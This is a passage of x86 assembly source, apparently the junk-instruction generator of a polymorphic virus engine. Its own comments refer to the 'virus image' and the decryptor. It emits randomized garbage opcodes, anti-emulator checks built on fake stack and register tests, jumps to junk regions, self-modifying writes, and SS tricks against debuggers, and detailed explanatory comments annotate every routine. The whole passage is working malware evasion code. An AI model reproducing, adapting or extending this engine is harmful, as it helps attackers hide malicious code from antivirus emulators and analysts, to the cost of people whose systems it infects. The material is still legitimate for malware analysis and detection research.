mov byte ptr [r_used+ebp],bl
|
||
exit_c_j_ss:
|
||
ret
|
||
|
||
|
||
gen_one_byters:
|
||
call get_random_al7
|
||
make_jump:
|
||
mov cl,al
|
||
mov al,byte ptr [eax+offset one_byters+ebp] ; get onebyter
|
||
cmp cl,05h
|
||
jbe not_jump
|
||
do_that_fjump:
|
||
cmp byte ptr [t_maxjmps+ebp],3 ; don't nest too much
|
||
je just_exit
|
||
inc byte ptr [t_maxjmps+ebp]
|
||
|
||
cmp al,0e9h ; for unconditional ones skip some
|
||
jae skip_unc ; things
|
||
|
||
cmp cl,07h
|
||
jne not_longjump
|
||
push eax
|
||
mov al,0fh ; long prefix
|
||
stosb
|
||
pop eax
|
||
not_longjump:
|
||
push eax
|
||
call get_random
|
||
and al,0fh
|
||
mov ch,al
|
||
pop eax
|
||
add al,ch
|
||
skip_unc:
|
||
stosb ; type of jump
|
||
stosb ; first off
|
||
cmp cl,07h
|
||
jne not_longone
|
||
dec edi
|
||
stosd
|
||
not_longone:
|
||
push edi
|
||
call rnd_garbage
|
||
pop ebx
|
||
mov eax,edi
|
||
sub eax,ebx ; offset of jump
|
||
dec byte ptr [t_maxjmps+ebp]
|
||
cmp cl,7
|
||
je long_jumper
|
||
cmp eax,7fh ; if not too big then use it
|
||
jb good_jump
|
||
mov edi,ebx ; else forget everything
|
||
dec edi
|
||
dec edi
|
||
ret
|
||
good_jump:
|
||
mov byte ptr [ebx-1],al
|
||
ret
|
||
long_jumper:
|
||
mov dword ptr [ebx-4],eax
|
||
ret
|
||
not_jump:
|
||
stosb
|
||
just_exit:
|
||
ret
|
||
|
||
mem_assign:
|
||
mov ax,058bh
|
||
jmp mem_common
|
||
|
||
mem_mathops:
|
||
call get_random
|
||
and al,111000b ; (0 to 7) * 8
|
||
add al,03h ; base
|
||
mem_common:
|
||
push eax
|
||
call get_register
|
||
shl cl,3 ; *8
|
||
add cl,05h ; base for eax
|
||
mov ah,cl
|
||
stosw
|
||
call g_dimension
|
||
|
||
; now offset
|
||
call get_address
|
||
stosd
|
||
pop eax
|
||
cmp al,3bh ; is a cmp
|
||
je make_jmp_after_cmp ; if so force a compare
|
||
ret
|
||
|
||
diff_movz: ; movsx,movzx,bt,btc,btr,bts,bswap
|
||
call get_random ; 1 bit dim, 2 bit m/b
|
||
mov cl,al
|
||
mov dh,ah
|
||
test cl,1100000b
|
||
jnz no_wpf
|
||
mov al,066h
|
||
stosb
|
||
no_wpf:
|
||
mov al,0fh
|
||
stosb
|
||
mov al,0b6h
|
||
shr cl,1
|
||
jc some_bt
|
||
shr cl,1
|
||
jc zero_extend
|
||
add al,08h
|
||
zero_extend:
|
||
shr cl,1
|
||
jc dest_dw ; generate movsx/movzx on d or w
|
||
inc al
|
||
dest_dw:
|
||
stosb
|
||
call get_random_al7
|
||
mov dl,al
|
||
add al,0c0h
|
||
call get_register
|
||
shl cl,3
|
||
add al,cl
|
||
and dh,011b
|
||
pushf
|
||
jnz just_regs
|
||
sub al,0c0h-05h
|
||
sub al,dl
|
||
just_regs:
|
||
stosb
|
||
popf
|
||
jnz justret_r
|
||
call get_address
|
||
stosd
|
||
justret_r:
|
||
ret
|
||
|
||
some_bt:
|
||
shr cl,1
|
||
jc do_bswap
|
||
add al,04h ; btX second byte
|
||
stosb
|
||
and cl,011000b
|
||
add cl,0e0h
|
||
mov al,cl
|
||
call get_register
|
||
add al,cl
|
||
stosb
|
||
shr dh,1
|
||
pushf ; make jmp after or not
|
||
and dh,01fh ; not much sense doing > 32
|
||
mov al,dh
|
||
stosb
|
||
popf
|
||
jc make_jmp_after_cmp
|
||
ret
|
||
|
||
do_bswap:
|
||
call get_register
|
||
mov al,0c8h ; bswap
|
||
add al,cl
|
||
stosb
|
||
ret
|
||
|
||
mov_registers:
|
||
call get_random_al7 ; random source
|
||
add al,0c0h
|
||
mov ah,08bh
|
||
call get_register ; useful dest
|
||
shl cl,3
|
||
add al,cl
|
||
xchg ah,al
|
||
stosw
|
||
jmp g_dimension
|
||
|
||
maths_registers:
|
||
call get_random
|
||
and al,0111000b
|
||
add al,03h ; base
|
||
mov ah,0c0h ; suff
|
||
push eax
|
||
|
||
call get_register ; dest
|
||
shl cl,03h
|
||
add ah,cl
|
||
|
||
xchg eax,ecx ; save temp in ecx
|
||
call get_random_al7 ; all regs
|
||
xchg eax,ecx ; reg in ECX and restore EAX
|
||
|
||
add ah,cl
|
||
stosw
|
||
|
||
call g_dimension
|
||
pop eax
|
||
cmp al,3bh
|
||
je make_jmp_after_cmp
|
||
ret
|
||
|
||
rotating_imms:
|
||
call get_random_al7
|
||
cmp al,0110b ; 0f0 doesn't exist
|
||
je rotating_imms
|
||
shl al,3 ; *8
|
||
add al,0c0h
|
||
|
||
call get_register
|
||
add al,cl
|
||
mov ah,0c1h
|
||
xchg al,ah
|
||
stosw
|
||
call g_dimension
|
||
xor ecx,ecx
|
||
inc cl
|
||
jmp put_immediates
|
||
|
||
notneg_register:
|
||
call get_random
|
||
shr al,1
|
||
mov ax,0d0f7h
|
||
jc not_add
|
||
add ah,08h
|
||
not_add:
|
||
call get_register
|
||
add ah,cl
|
||
stosw
|
||
; jmp g_dimension
|
||
|
||
g_dimension:
|
||
; EDI after generated garb
|
||
reget_dim:
|
||
call get_random_al7
|
||
cmp al,2
|
||
jae no_change
|
||
word_change:
|
||
mov ecx,dword ptr [edi-2]
|
||
mov byte ptr [edi-2],66h ; the prefix
|
||
mov dword ptr [edi-1],ecx
|
||
inc edi
|
||
mov al,2
|
||
jmp post_no_change
|
||
no_change:
|
||
mov al,4
|
||
post_no_change:
|
||
xchg eax,ecx ; in ECX needed immediates
|
||
ret
|
||
|
||
imm_assign:
|
||
call get_register
|
||
mov al,0b8h ; base
|
||
add al,cl
|
||
stosb
|
||
inc edi
|
||
call g_dimension
|
||
dec edi
|
||
; jmp put_immediates
|
||
|
||
put_immediates:
|
||
; cl how many
|
||
call get_random
|
||
put_imm_part:
|
||
stosb
|
||
shr eax,8
|
||
loop put_imm_part
|
||
ret
|
||
|
||
inc_dec_reg:
|
||
call get_random
|
||
and al,01000b ; 0 or 8
|
||
add al,40h ; incdec generation
|
||
call get_register
|
||
add al,cl
|
||
stosb
|
||
inc edi
|
||
call g_dimension
|
||
dec edi
|
||
ret
|
||
|
||
xchg_regs:
|
||
mov al,087h ; xchg eax,eax
|
||
call get_register
|
||
mov ah,cl
|
||
call get_register
|
||
common_test_xchg:
|
||
shl cl,3
|
||
add ah,cl
|
||
add ah,0c0h
|
||
stosw
|
||
jmp g_dimension
|
||
|
||
test_regs:
|
||
call get_random
|
||
xchg eax,ecx
|
||
and cx,0707h
|
||
mov ah,ch
|
||
mov al,085h ; test eax,eax
|
||
jmp common_test_xchg
|
||
|
||
;-----------------------------------------------------------------------
; temp_save_change -- garbage with a purpose: with probability 1/4 pick one
; of the decryptor's live registers (pointer, counter or key register),
; move its value into a free register, let rnd_garbage trash the original,
; then move the value back.  Emits:
;   MOV/XCHG free,live ; <garbage> ; MOV/XCHG live,free
; In:   edi = output pointer; r_pointer/r_counter/r_regkey/r_used valid
; Out:  edi advanced; r_used restored to its value before the move
; Clobbers: eax, ebx, ecx, edx, flags
;-----------------------------------------------------------------------
temp_save_change:
call get_random_al7
sub al,6 ; 1/4 probability, since this couldn't
jc skip_changer ; come too often

call select_save ; CF=1: nothing suitable; else al = live reg,
jc skip_changer ; edx -> its slot, cl = snapshot of r_used

push ecx ; keep the r_used snapshot
call save_mov_xchg ; emits the save move; al = holding reg, ah = restore opcode

xchg eax,ecx ; in al new register
mov al,byte ptr [edx] ; imp_reg
shl al,3 ; live register -> reg field
xchg eax,ecx
add al,cl
or al,0c0h
xchg al,ah
stosw ; mov important_reg,some_reg
pop ebx
mov byte ptr [r_used+ebp],bl ; restore regs status
skip_changer:
ret
;-----------------------------------------------------------------------
; select_save -- choose one of the three live-register slots
; (r_pointer, r_counter, r_regkey) that can be temporarily relocated.
; In:   ebp = delta offset
; Out:  CF=0: al = register number, edx -> its slot, cl = current r_used
;       CF=1: slot not assigned yet (0FFh), key is an immediate (20h), or
;             the register is not currently flagged in r_used
; Clobbers: eax, ecx, edx, flags
;-----------------------------------------------------------------------
select_save:
call get_random_al7
sub al,5 ; get from 0 to 2
jc select_save ; upper bits of eax are already 0 (get_random_al7)

xchg eax,edx
add edx,offset r_pointer
add edx,ebp ; edx = &r_pointer[0..2]
mov al,byte ptr [edx]

cmp al,0ffh ; not already assigned?
je exit_bad

cmp al,20h ; no key signature, if so skip
je exit_bad

call is_used ; maybe is already saved on stack or
jnz return_good ; such?
exit_bad:
stc
ret
return_good:
mov cl,byte ptr [r_used+ebp]
clc
ret
;-----------------------------------------------------------------------
; save_mov_xchg -- emit the "save" half of a register relocation:
;   MOV free,live (8Bh /r)  or  XCHG free,live (87h /r)
; followed by random garbage, and pick the opcode for the later restore.
; In:   al = live register to relocate
; Out:  al = free register now holding the value,
;       ah = opcode for the restore (87h XCHG or 8Bh MOV);
;       r_used: free register set, live register cleared;
;       edi past the move and the garbage
; Clobbers: ebx (= live register), ecx, flags
; Note: the label names are inverted relative to the code -- use_mov_first
;       is reached when `mov cl,4` is skipped, i.e. when XCHG (87h) is used
;       for the save; cl/ch = 4 select MOV (87h+4 = 8Bh).
;-----------------------------------------------------------------------
save_mov_xchg:
xchg eax,ebx ; bl = live register
call get_register ; get an usable register
xchg eax,ecx ; al = free register
call set_used ; set this one as used
call unset_used ; and the previous as unused
mov ah,087h ; xchg reg,reg base
push eax
xor ecx,ecx
call get_random ; select if using mov or xchg
shr al,1
jc use_mov_first
mov cl,4 ; + 4 becames mov reg,reg base
use_mov_first:
shr al,1 ; when just saving this won't be used
jc use_mov_after ; select whichone for restore aswell
mov ch,4
use_mov_after:
pop eax
add ah,ch ; restore one
push eax
sub ah,ch
add ah,cl ; opcode for the save
shl al,3 ; * 8 -> free register in the reg field
add al,bl ; live register in rm
or al,0c0h ; mov some_reg,important_reg
xchg al,ah
stosw ; put the moving of regs
call rnd_garbage ; may now trash the live register
pop eax ; al = free register, ah = restore opcode
ret
;-----------------------------------------------------------------------
; sets_misc -- garbage: SETcc r8 (0F 90h+cc /r) with a random condition
; into a byte register whose 32-bit parent is not in use.  If get_register
; hands back esp/ebp/esi/edi (no 8-bit form) the already fetched random
; bytes are reused by cant_useset to emit SHLD/SHRD instead.
; In:   edi = output pointer
; Out:  edi past the instruction
; Clobbers: eax, ecx, flags
;-----------------------------------------------------------------------
sets_misc:
call get_random ; type of sel
mov al,0fh
and ah,al ; condition code 0..0Fh
add ah,090h ; 0F 9x = SETcc
call get_register
cmp cl,3
ja cant_useset ; won't retry, so not too many
stosw
bswap eax ; rnd -> fresh random bits into al
shr al,1
jc docs_ones
add cl,08h ; has 2 set of ocodes: sets a reg-field bit; SETcc does not
; use the reg field, so both encodings execute identically
docs_ones:
shr al,1
jc low_ones
add cl,04h ; high or low 8: ah/ch/dh/bh instead of al/cl/dl/bl
low_ones:
mov al,0c0h
add al,cl
stosb
ret
;-----------------------------------------------------------------------
; cant_useset -- garbage: SHLD/SHRD r/m32,r32,imm8|CL (0F A4/A5/AC/AD),
; optionally behind a 66h prefix.  Entered from sets_misc.
; In:   al = 0Fh, ah = 90h+cc (reused as random bits), cl = the register
;       sets_misc drew (4..7) -- it only decides imm8 vs CL form and is
;       not an operand
; Out:  edi past the instruction
; Clobbers: eax, ecx, flags
; Encoding: destination (r/m, written) = a register from get_register;
;           reg field (read only) = random; count = a random byte (the
;           CPU masks it to 5 bits) or CL.
;-----------------------------------------------------------------------
cant_useset: ; shld/shrd
test ah,110b ; last bit used later
jnz no_66p
push eax
mov al,066h ; with words
stosb
pop eax
no_66p:
shr ah,1 ; CF = lowest condition bit
mov ah,0a4h ; SHLD r/m32,r32,imm8
jc do_shlld
add ah,0ch-04h ; shrd (0ACh)
do_shlld:
cmp cl,7
jne noss_with_cl
inc ah ; with immediate cl -> A5h/ADh: count in CL instead of imm8
noss_with_cl:
stosw
call get_random
and al,0111000b ; random reg field (source operand, read only)
call get_register ; cl = destination register, not in use
add al,cl
add al,0c0h ; in ah we have rnd sh nr
stosb
test byte ptr [edi-2],01b ;was using cl?
jnz wasnt_with_cl
dec edi
stosw ; rewrite modrm and append the random imm8 count
wasnt_with_cl:
ret
;-----------------------------------------------------------------------
; xadd_cmpxchg -- garbage: CMPXCHG r/m,reg (0F B0/B1) or XADD r/m,reg
; (0F C0/C1) between two registers not in use, in 8-, 16- (66h prefix)
; or 32-bit form.  CMPXCHG also writes eax on a mismatch, so it is only
; emitted while eax is free.
; In:   edi = output pointer; ebp = delta offset
; Out:  edi past the instruction (nothing emitted on the bail-out path)
; Clobbers: eax, ecx, flags
;-----------------------------------------------------------------------
xadd_cmpxchg:
call get_random
and ah,10h ; 10h or 00h: 00h -> CMPXCHG (B1h), 10h -> XADD (C1h)
jc np_nchk ; NOTE(review): AND always clears CF, so this branch is dead
; and the eax test below applies to XADD too -- harmless, it
; only skips generation more often than the author intended
test byte ptr [ebp+r_used],01b ; is ax used?
jnz home_xx ; if so no cmpxchg
np_nchk:
test al,110b
jnz no_66pr
mov al,66h ; 1 in 4: 16-bit operand size
stosb
no_66pr:
add ah,0b1h
cmp byte ptr [edi-1],066h ; no byte form behind a 66h prefix (also
je cant_byterize ; fires on a stray 66h left by earlier garbage)
and al,1
sub ah,al ; cmpxchg or xadd with b or notb (B0h/C0h = byte form)
cant_byterize:
mov al,0fh
stosw
get_reg1:
call get_register
mov ch,cl ; ch = r/m (destination, written by both instructions)
get_reg2:
call get_register ; cl = reg field (source; XADD writes it as well)
mov al,0c0h
test byte ptr [edi-1],01b ; was using bytes?
jnz no_byteprob
cmp ch,3 ; if bytes must be <= 3
ja get_reg1
cmp cl,3
ja get_reg2
push eax
bswap eax ; high part of rnd
and ax,010000000100b ; random +4 on both src and dest (404h: ah/ch/dh/bh)
add cx,ax
pop eax
no_byteprob:
shl cl,3
add al,cl
add al,ch
stosb
home_xx:
ret
;-----------------------------------------------------------------------
; emu_stuffy -- anti-emulator garbage.  Only 1 call in 32 emits anything;
; the random bits in ah then select one of: stack_checking (below),
; regs_checking (below), ss_play, mem_write, xlat_generation or
; enter_generation.  Each check emits code whose outcome is fixed on a
; real CPU, followed (do_jumpzh) either by a Jcc that is never taken, or
; by one that is always taken and skips a junk region (bogus backward
; JMP, RET or a random byte) that would derail a wrong emulation.
; In:   edi = output pointer; ebp = delta offset
; Out:  edi advanced; edx -> t_pushed (the sub-generators reach the other
;       mem_data fields relative to it, so their layout is part of the
;       contract)
; Clobbers: eax, ebx, ecx, edx, flags
;-----------------------------------------------------------------------
emu_stuffy: ; some stuff to try to fool emus
call get_random
and al,011111b ; not too often: 1 in 32 calls continues
jnz keep_few_ae

lea edx,[ebp + offset t_pushed] ; base for the mem_data fields used below

shr ah,1
jc regs_checking

shr ah,1
jc xlat_generation

stack_checking:
; check if stack seems consistent or not:
;   PUSH imm32 ; <garbage> ; POP reg ; <garbage> ; op reg,imm' ; Jcc
; op/imm' are chosen so the result is zero iff the popped value equals
; the pushed one (ADD -v, AND ~v, SUB v, XOR v or CMP v).
mov al,68h ; push immediate opcode
stosb
call get_random
stosd ; the pushed value ...
push eax ; ... kept on the generator's stack for the check
xor ch,ch ; nr of dword on stack
xchg ch,byte ptr [edx] ; don't smash our stack: t_pushed = 0 while garbage runs
call rnd_garbage
call get_register
mov al,cl
call set_used ; the popped register must survive the next garbage
mov bl,al
add al,058h ; pop opcode (58h+r)
stosb
mov byte ptr [edx],ch ; can work on stack again
call rnd_garbage
call unset_used ; bl = the register

typepopchk:
call get_random
shr al,1
jnc check_posones
and ah,100000b ; add/and reg32, not/neg imm
jnz just_not_atesp
dec dword ptr [esp] ; since add needs the neg value: ~(v-1) = -v
just_not_atesp:
not dword ptr [esp] ; the imm (AND with ~v yields 0)
add ah,0c0h ; modrm C0h = /0 ADD, E0h = /4 AND
jmp chksta_st
check_posones:
and ah,011000b
jz typepopchk ; 0 would give /4 AND with the raw value -- re-roll
add ah,0e0h ; E8h = /5 SUB, F0h = /6 XOR, F8h = /7 CMP
chksta_st:
mov al,81h ; cmp/sub/xor reg32,imm
add ah,bl ; rm = the popped register
stosw
pop eax ; value to check with
stosd
check_okequ: ; also the tail of mem_write (CMP reg,[addr])
mov bx,07574h ; result is 0 on a real CPU: bh = 75h JNZ (never taken), bl = 74h JZ (always taken)
jmp do_jumpzh


regs_checking:
shr ah,1
jc ss_play

shr ah,1
jc mem_write

; ones just checking our regs (pointer and counter) consistency
; compare with zero in various ways and jump at the right code if !=
; Emitted only while w_loopbg is still 0; the generated check assumes the
; chosen register is non-zero at that point.
cmp dword ptr [edx - (offset t_pushed - offset w_loopbg)],00h
; not in the loop
jne keep_few_ae

bswap eax
and eax,01b ; 0 or 1
add eax,ebp
add eax,offset r_pointer ; so will be r_pointer or r_counter
mov al,byte ptr [eax]
inc al ; already initialized ? (0FFh = not yet)
jz keep_few_ae
dec al
call is_used ; check that we aren't in moving thingy (also sets cl = reg)
jz keep_few_ae
reran_h:
call get_random_al7 ; type of cmp
cmp al,5
jae or_oring ; do or reg,reg

lea ebx,[edx - (offset t_pushed - offset chk_counter)]
add ebx,eax ; which one: 5-byte table CMP/OR/SUB/XOR/ADD (chk_counter + key_changers)
mov ah,byte ptr [ebx]
mov al,83h ; 83h /n reg32,imm8
add ah,cl
stosw
xor al,al
stosb ; with a zero
jmp do_jumpzh_reg

or_oring:
mov ax,0c00bh ; or eax,eax base
add ah,cl ; have in cl the reg
shl cl,3
add ah,cl ; both src and dest
stosw
do_jumpzh_reg:
mov bx,07475h ; ZF clear on a real CPU: bh = 74h JZ (never taken), bl = 75h JNZ (always taken)
; JZ and JNZ creation (considering BH is okay, while BL makes shit)
do_jumpzh:
; In: bh = Jcc opcode never taken on a real CPU, bl = Jcc always taken
call get_random
shr al,1 ; do jz or jnz ?
jnc do_jz_easily
; else we have to do a construction with
; more sense: the taken Jcc skips a junk region; its rel8 is patched below
mov al,bl
stosw ; ah = placeholder displacement
too_long_redo:
push dword ptr [edx] ; save stack situation (t_pushed..t_inacall) -- the skipped code never runs
mov ebx,edi ; jmp offset +1
call rnd_garbage
call get_random ; random byte to break execution or ret
shr ah,1
jc no_jmpback ; do a long jmp back to hide the loop one
mov al,0e9h
stosb
or ax,0ffffh ; not too long: after bswap the rel32 is FFFFF8xxh..FFFFFFxxh (1..2048 bytes back)
bswap eax
or ah,0f8h
stosd
jmp comehome
no_jmpback:
shr ah,1
jnc rndbyteuse
mov al,0c3h ; a ret is quite polite for the emu :)
rndbyteuse:
stosb
comehome:
call rnd_garbage
pop dword ptr [edx]
mov eax,edi
sub eax,ebx ; length of the skipped region
cmp eax,07fh ; see it is not too long for a short jmp
jbe oki_lenght
mov edi,ebx ; else retry
jmp too_long_redo
oki_lenght:
mov byte ptr [ebx-1],al ; patch the Jcc rel8
jmp keep_few_ae
do_jz_easily:
mov al,bh ; jz short to some random location (never taken; ah = random rel8)
stosw
keep_few_ae:
ret
;-----------------------------------------------------------------------
; xlat_generation -- anti-emulator garbage: MOV EBX,addr ; <garbage> ; XLAT
; where addr (from get_address) lies inside the running virus image.
; Only emitted when neither eax nor ebx is in use (bits 0 and 3 of r_used);
; ebx is flagged in use while the intervening garbage is generated.
; Entered from emu_stuffy with edx -> t_pushed and random bits in ah.
; Note: XLAT reads [ebx+al]; al is whatever the garbage left in eax, so
;       the read may land up to 255 bytes past addr.
;-----------------------------------------------------------------------
xlat_generation: ; is xlat emulated? anyway, hc garbage :)
shr ah,1
jnc enter_generation

test byte ptr [edx - (offset t_pushed - offset r_used)],01001b
jnz keep_few_ae ; are ebx and eax unused ?
mov al,0bbh ; mov ebx
stosb
push edx ; get_address clobbers edx
call get_address ; a decent mem addy
stosd
pop edx ; set ebx as used
or byte ptr [edx - (offset t_pushed - offset r_used)],01000b
call rnd_garbage ; and then unset ebx as used
and byte ptr [edx - (offset t_pushed - offset r_used)],(NOT 1000b)
mov al,0d7h ; xlat opcode
stosb
ret
;-----------------------------------------------------------------------
; enter_generation -- garbage: ENTER frame,0 ; <garbage> ; LEAVE with a
; random frame size of 0..60 bytes (multiple of 4).  While the garbage is
; generated t_pushed is forced to 0 (so from_stack does not touch the
; frame) and ebp is flagged in use; both are restored before LEAVE.
; Entered from emu_stuffy with edx -> t_pushed.
;-----------------------------------------------------------------------
enter_generation: ; some more funny garbage
mov al,0c8h ; enter
stosb
bswap eax ; fresh random byte into al
and al,0111100b ; requested stack: 0..3Ch, dword multiple
stosb ; imm16 low byte
xor al,al
stosb ; imm16 high byte
stosb ; nesting level 0
xchg al,byte ptr [edx] ; don't smash our stack: t_pushed = 0, old value in al
mov ah,byte ptr [edx - (offset t_pushed - offset r_used)] ; no ebp
or byte ptr [edx - (offset t_pushed - offset r_used)],100000b ; flag ebp (bit 5) in use
call rnd_garbage
mov byte ptr [edx],al ; restore t_pushed
mov byte ptr [edx - (offset t_pushed - offset r_used)],ah ; restore r_used
mov al,0c9h ; leave
stosb
ret
;-----------------------------------------------------------------------
; ss_play -- anti-debugger garbage around SS.  Either
;   PUSH SS ; <garbage> ; POP SS
; or
;   [66h] MOV reg,SS ; <garbage> ; MOV SS,reg   (reg flagged in use meanwhile)
; SS never actually changes; the author relies on the side effects of
; loading SS (presumably the interrupt/single-step inhibition that follows
; POP SS / MOV SS) to upset debuggers and emulators.  t_pushed is forced
; to 0 while the garbage between the push and the pop is generated.
; Entered from emu_stuffy with edx -> t_pushed and random bits in ah.
; Clobbers: eax, ebx, ecx, flags
;-----------------------------------------------------------------------
ss_play:
; opcodes that modify SS (actually they don't change it, but will
; make life harder for debuggers and some emus hopefully)
shr ah,1
jc with_regs_ssplay
; first way, just push ss and then pop ss later
mov al,016h ; push
stosb
xor ah,ah
xchg ah,byte ptr [edx] ; don't smash our stack: t_pushed = 0, old value in ah
call rnd_garbage
xchg ah,byte ptr [edx] ; restore t_pushed
inc al ; pop (17h)
stosb
ret
with_regs_ssplay:
; mov reg,ss and later mov ss,reg
and ah,011b
jnz no_66pfss
mov al,066h ; is oky anyway
stosb
no_66pfss:
call get_register
mov ax,0d08ch ; mov reg,ss (8Ch, modrm D0h: mod=11, sreg=010=SS)
add ah,cl
stosw
xchg eax,ecx ; al = register, ecx = opcode word
call set_used ; don't mess with that one
call rnd_garbage
xchg eax,ebx ; bl = register
call unset_used
xchg eax,ecx ; eax = opcode word again
inc al
inc al ; mov ss,reg (8Eh)
stosw
ret
;-----------------------------------------------------------------------
; mem_write -- anti-emulator garbage that writes into the decryptor's own
; code:  MOV [addr],reg  (89h /r, disp32), where addr is a random dword
; 4..1027 bytes behind the current output position (or behind the loop
; start while a loop is open), i.e. code that will not run again.  With
; probability 1/2 a CMP reg,[addr] (3Bh /r) is appended after garbage,
; followed via check_okequ by the JZ/JNZ construction of emu_stuffy.
; This is self-modification of already executed decryptor bytes: the
; generated code only survives if the host's code section is writable.
; m_writes guards against nesting a second write while a check is pending.
; Bails out (removing the two bytes already emitted) when inside a call
; with no loop open, or when there is no room behind the position.
; In:   edx -> t_pushed; ebp = delta offset
; Clobbers: eax, ebx, ecx, flags
;-----------------------------------------------------------------------
mem_write:
; write a dd somewhere (back where we won't go :) ) and then check
; if the contents are the same after some garbage
cmp byte ptr [edx - (offset t_pushed - offset m_writes)],01h
; don't nest, could work
je exit_mw_r ; on same addy (should be)
; well we could even put this
; away :P
inc byte ptr [edx - (offset t_pushed - offset m_writes)]
call get_random ; get a register
and ah,0111000b ; random reg field; only read by the store, so no r_used check
push eax
add ah,05h ; mod=00 rm=101: [disp32]
mov al,089h
stosw
mov ecx,[edx - (offset t_pushed - offset t_inipnt)] ; ecx = start of the output buffer
restart_memsearch:
mov ebx,[edx - (offset t_pushed - offset w_loopbg)]
or ebx,ebx ; not in the loop
jnz looping_alr
cmp byte ptr [edx - (offset t_pushed - offset t_inacall)],01h
; could overwrite ourslv
jne can_proceed_mw
bad_mem:
pop eax
dec edi ; drop the 89h/modrm already stored
dec edi
exit_mw:
dec byte ptr [edx - (offset t_pushed - offset m_writes)]
exit_mw_r:
ret
can_proceed_mw:
mov ebx,edi ; else can do from here down, anyway
; we won't return to it and we are
; sure that layers are not back
looping_alr:
sub ebx,4
cmp ebx,ecx ; is there at least a bit of place?
jbe bad_mem
call get_random
and eax,03ffh
sub ebx,eax
sub ebx,ecx ; buffer-relative offset of the target dword
jc restart_memsearch
add ebx,[edx - (offset t_pushed - offset v_runnin)] ; -> run-time address
mov eax,ebx
stosd

call get_random ; check what was written or not?
shr al,1 ; to make less visibile maybe ;)
pop eax ; the used reg
jc exit_mw
xchg al,ah
shr al,3 ; al = register number
call is_used
pushf ; remember whether it was already live
call set_used ; protect it across the garbage
call rnd_garbage
popf
push ebx ; the address
jnz wasntusedb
mov ebx,eax ; if was used then nuthing, else
call unset_used ; put reusable
wasntusedb:
shl al,3
add al,5
mov ah,03bh ; cmp reg, memval
xchg ah,al
stosw
pop eax
stosd ; the addy
jmp check_okequ
;-----------------------------------------------------------------------
; from_stack -- garbage that looks like compiler stack traffic:
;   op [esp]|[esp+disp8],reg32   (01/09/11/19/21/29/31/39h or 89h MOV)
;   op reg32,[esp]|[esp+disp8]   (same +2: 03..3Bh / 8Bh)
; The store form is used only when the generated code has pushed dwords
; of its own (t_pushed > 0), no call is open, and the random slot index
; is below t_pushed; otherwise the load form is emitted with a slot index
; 0..7 (reading up to [esp+28] -- whatever the host left there).  When the
; store roll fails, ah is 0 and the load is always from plain [esp].
; The register comes from get_register (not in use); disp8 = 4*index.
; In:   edi = output pointer; ebp = delta offset
; Clobbers: eax, ecx, flags
;-----------------------------------------------------------------------
from_stack: ; read/write stuff from stack referencing
; with esp quite often found in windoze code
call get_random ; type of operation
and al,0fh
cmp al,8
jae make_mov
shl al,3
inc al ; 01h + op*8: ALU op r/m32,r32
jmp selected_op
make_mov:
mov al,89h
selected_op:
mov ch,al ; ch = opcode
bswap eax ; random bits into ah
mov al,byte ptr [ebp + t_pushed] ; 'our' dd on stack
or al,al
jz cant_write_anyway

cmp byte ptr [ebp + t_inacall],01h
je cant_write_anyway

dec al
mov cl,al ; highest slot index we own

call get_random_al7
cmp al,cl
ja cant_write_anyway ; don't retry, so less writes
mov ah,al ; slot index
jmp prepare_all
cant_write_anyway:
and ah,0111b
add ch,02h ; switch to the load form
prepare_all:
mov al,ch
stosb
call get_register
shl cl,3 ; register -> reg field
or ah,ah
jz dont_addesp ; just [esp], no + imm
add cl,40h ; mod=01: disp8 follows
dont_addesp:
add cl,04h ; rm=100: SIB follows
xchg al,cl
stosb
mov al,24h ; SIB: base=esp, no index
stosb
or ah,ah
jz no_immesp
shl ah,2 ; * 4, dword padded is always used
mov al,ah
stosb
no_immesp:
ret
; tables for various purposes
; garbage_mask / garbage_number -- parameters of the garbage-type selector
; (the selector itself, rnd_garbage, is not in this listing).
; garbage_number (14h = 20) equals the highest index of garbage_offsets.
garbage_mask equ 1fh
garbage_number equ 14h

; garbage_offsets -- dispatch table of the 21 garbage generators, indices
; 0..14h.  Entries 0..8, 0Fh and 10h are defined earlier in the file.
garbage_offsets:
dd offset call_subroutines ; 00h
dd offset gen_one_byters ; 01h
dd offset mov_registers ; 02h
dd offset mem_assign ; 03h
dd offset mem_mathops ; 04h
dd offset maths_immediate ; 05h
dd offset maths_immediate_short ; 06h
dd offset maths_registers ; 07h
dd offset rotating_imms ; 08h
dd offset notneg_register ; 09h
dd offset imm_assign ; 0Ah
dd offset inc_dec_reg ; 0Bh
dd offset xchg_regs ; 0Ch
dd offset test_regs ; 0Dh
dd offset temp_save_change ; 0Eh
dd offset cdq_jmps_savestack ; 0Fh
dd offset diff_movz ; 10h
dd offset sets_misc ; 11h
dd offset xadd_cmpxchg ; 12h
dd offset emu_stuffy ; 13h
dd offset from_stack ; 14h
; one_byters -- opcode bytes for gen_one_byters (not in this listing):
; 90h NOP, FCh CLD, FDh STD, F8h CLC, F9h STC, F5h CMC.  The last two
; (70h Jcc rel8, 80h group-1 r/m8,imm8) are not single-byte instructions;
; how the consumer treats them cannot be confirmed from this listing.
one_byters db 090h,0fch,0fdh,0f8h,0f9h,0f5h,070h,080h

; change_jump -- 98h CWDE, 99h CDQ, EBh JMP short, E9h JMP near
; (consumer cdq_jmps_savestack is not in this listing)
change_jump db 098h,099h,0ebh,0e9h

; _math_imm / _math_key -- decryptor operation templates as little-endian
; words: low byte = opcode, high byte = modrm with [ebx] as destination.
_math_imm:
dw 008c1h ; ror d[ebx],imm (C1 /1)
dw 02881h ; sub d[ebx],imm (81 /5)
dw 03081h ; xor d[ebx],imm (81 /6)
dw 00081h ; add d[ebx],imm (81 /0)
dw 000c1h ; rol d[ebx],imm (C1 /0)
_math_key:
dw 008d3h ; ror d[ebx],cl (D3 /1)
dw 00029h ; sub d[ebx],eax
dw 00031h ; xor d[ebx],eax
dw 00001h ; add d[ebx],eax
dw 000d3h ; rol d[ebx],cl (D3 /0)

; chk_counter -- modrm bytes (mod=11, rm=0) for the "reg op 0" check in
; regs_checking: F8h = /7 CMP, C8h = /1 OR.  regs_checking indexes FIVE
; bytes starting here, so the first three key_changers bytes (SUB, XOR,
; ADD) belong to that table as well -- keep the two definitions adjacent.
; cmp,or,sub,xor,add (in byte order)
chk_counter db 0f8h,0c8h
key_changers db 0e8h,0f0h,0c0h ; E8h = /5 SUB, F0h = /6 XOR, C0h = /0 ADD (group-1 modrm)
db 0c0h,0c8h ; C0h = /0 ROL, C8h = /1 ROR (with C1/D3)
db 0d0h ; D0h = /2 NOT (with F7)
db 040h,048h ; 40h+r INC, 48h+r DEC
;-----------------------------------------------------------------------
; krappo_gen -- store 0..31 random bytes at edi (not instructions, plain
